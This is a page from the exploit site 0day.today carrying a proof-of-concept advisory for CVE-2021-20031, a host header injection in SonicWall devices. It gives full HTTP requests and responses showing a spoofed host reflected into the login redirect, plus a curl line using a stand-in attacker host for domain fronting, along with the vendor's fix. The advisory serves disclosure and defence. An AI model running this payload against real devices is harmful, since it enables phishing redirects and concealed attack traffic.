0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Sonicwall SonicOS 7.0 - Host Header Injection Vulnerability
Author
Risk
[
Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: Sonicwall SonicOS 7.0 - Host Header Injection # Google Dork: inurl:"auth.html" intitle:"SonicWall" # intitle:"SonicWall Analyzer Login" # Exploit Author: Ramikan # Vendor Homepage:sonicwall.com # Affected Devices: All SonicWall Next Gen 6 Devices # Tested On: SonicWall NAS 6.2.5 # Affected Version: All SonicWall Next Gen 6 Devices till 6.5.3 # Fixed Version:Gen6 firmware 6.5.4.8-89n # CVE : CVE-2021-20031 # CVSS v3:5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) # Category:Hardware, Web Apps # Reference : https://github.com/Ramikan/Vulnerabilities/ ************************************************************************************************************************************* Vulnerability 1: Host Header Injection ************************************************************************************************************************************* Description: A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack Impact: Host Header changed to different domain (fakedomain.com). Fakedomain.com can be found in two lines in the HTTP response, below are the two lines. var jumpURL = "https://fakedomain.com/auth.html"; ease be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a> ************************************************************************************************************************************* Normal Request ************************************************************************************************************************************* GET / HTTP/1.1 Host: 192.168.10.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 ************************************************************************************************************************************* Normal Response ************************************************************************************************************************************* HTTP/1.0 200 OK Server: SonicWALL Expires: -1 Cache-Control: no-cache Content-type: text/html; charset=UTF-8; X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' blob: data: ws: wss: sonicwall.com *.sonicwall.com; <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> ++++++++++++++++++snipped+++++++++++++++++++++++ </head> <body class="login_bg"> <div class="login_outer"> <div class="login_inner"> <div class="vgap48"></div> <div class="login_logo"> <img src="logo_sw.png"> </div> <div class="login_prodname"> Network Security Appliance </div> <div class="vgap48"></div> <div class="login_msg_header"> Please be patient as you are being re-directed to <a href="https://192.168.10.1/auth.html" target="_top">a secure login page</a> </div> <div class="vgap24"></div> </div> </div> </body> </html> ************************************************************************************************************************************* POC ************************************************************************************************************************************* Host Header changed to different domain (fakedomain.com). Fakedomain.com can be found in two lines in the response, below are the two lines. var jumpURL = "https://fakedomain.com/auth.html"; ease be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a> ************************************************************************************************************************************* Request: ************************************************************************************************************************************* GET / HTTP/1.1 Host: fakedomain.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Upgrade-Insecure-Requests: 1 Connection: close Cookie: temp= ************************************************************************************************************************************* Response: ************************************************************************************************************************************* HTTP/1.0 200 OK Server: SonicWALL Expires: -1 Cache-Control: no-cache Content-type: text/html; charset=UTF-8; X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' blob: data: ws: wss: sonicwall.com *.sonicwall.com; <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="Content-Type" content="text/html"> <title>Document Moved</title> <meta name="id" content="docJump" > <link rel=stylesheet href="swl_styles-6.2.5-2464327966.css" TYPE="text/css"> <link rel=stylesheet href="swl_login-6.2.5-2193764341.css" TYPE="text/css"> <script type="text/JavaScript"> var resetSecureFlag = false; setTimeout("goJump();", 1000); function goJump() { var jumpURL = "https://fakedomain.com/auth.html"; var jumpProt = jumpURL.substr(0,6).toLowerCase(); var ix; if (jumpProt.substr(0,4) == "http" && (ix = jumpProt.indexOf(":")) != -1) { jumpProt = jumpProt.substr(0,ix+1); if (location.protocol.toLowerCase() != jumpProt) { window.opener = null; top.opener = null; } } if (resetSecureFlag) { var sessId = getCookie("SessId"); var pageSeed = swlStore.get("PageSeed", {isGlobal: true}); if (sessId) { setCookieExt("SessId", sessId, { strictSameSite: true }); } if (pageSeed) { swlStore.set("PageSeed", pageSeed, {isGlobal: true}); } } top.location.href = jumpURL; } function setCookie(key, value) { var argv = setCookie.arguments; var argc = setCookie.arguments.length; var expires = (argc > 2) ? argv[2] : null; var path = (argc > 3) ? argv[3] : null; var domain = (argc > 4) ? argv[4] : null; var secure = (argc > 5) ? argv[5] : false; document.cookie = key + "=" + escape (value) + ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) + ((path == null) ? "" : ("; path=" + path)) + ((domain == null) ? "" : ("; domain=" + domain)) + ((secure == true) ? "; secure" : ""); } function getCookie(key) { if (document.cookie.length) { var cookies = ' ' + document.cookie; var start = cookies.indexOf(' ' + key + '='); if (start == -1) { return null; } var end = cookies.indexOf(";", start); if (end == -1) { end = cookies.length; } end -= start; var cookie = cookies.substr(start,end); return unescape(cookie.substr(cookie.indexOf('=') + 1, cookie.length - cookie.indexOf('=') + 1)); } else { return null; } } </script> </head> <body class="login_bg"> <div class="login_outer"> <div class="login_inner"> <div class="vgap48"></div> <div class="login_logo"> <img src="logo_sw.png"> </div> <div class="login_prodname"> Network Security Appliance </div> <div class="vgap48"></div> <div class="login_msg_header"> Please be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a> </div> <div class="vgap24"></div> </div> </div> </body> </html> The redirection is happening to https://fakedomain.com/auth.html. ************************************************************************************************************************************* Attack Vector: ************************************************************************************************************************************* Can be used for domain fronting. curl -k --header "Host: attack.host.net" "Domain Name of the Sonicwall device" ************************************************************************************************************************************* Vendor Response: ************************************************************************************************************************************* Fix: SonicWall has fixed the issue in Gen6 firmware 6.5.4.8-89n (build is available in mysonicwall.com) - fix is provided with a CLI option > configure > administration > enforce-http-host-check, to avoid Host header redirection. Workaround: Please disable port 80 to mitigate it and this issue affected all Gen6 firewall products. https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0019 ************************************************************************************************************************************* # 0day.today [2024-09-28] #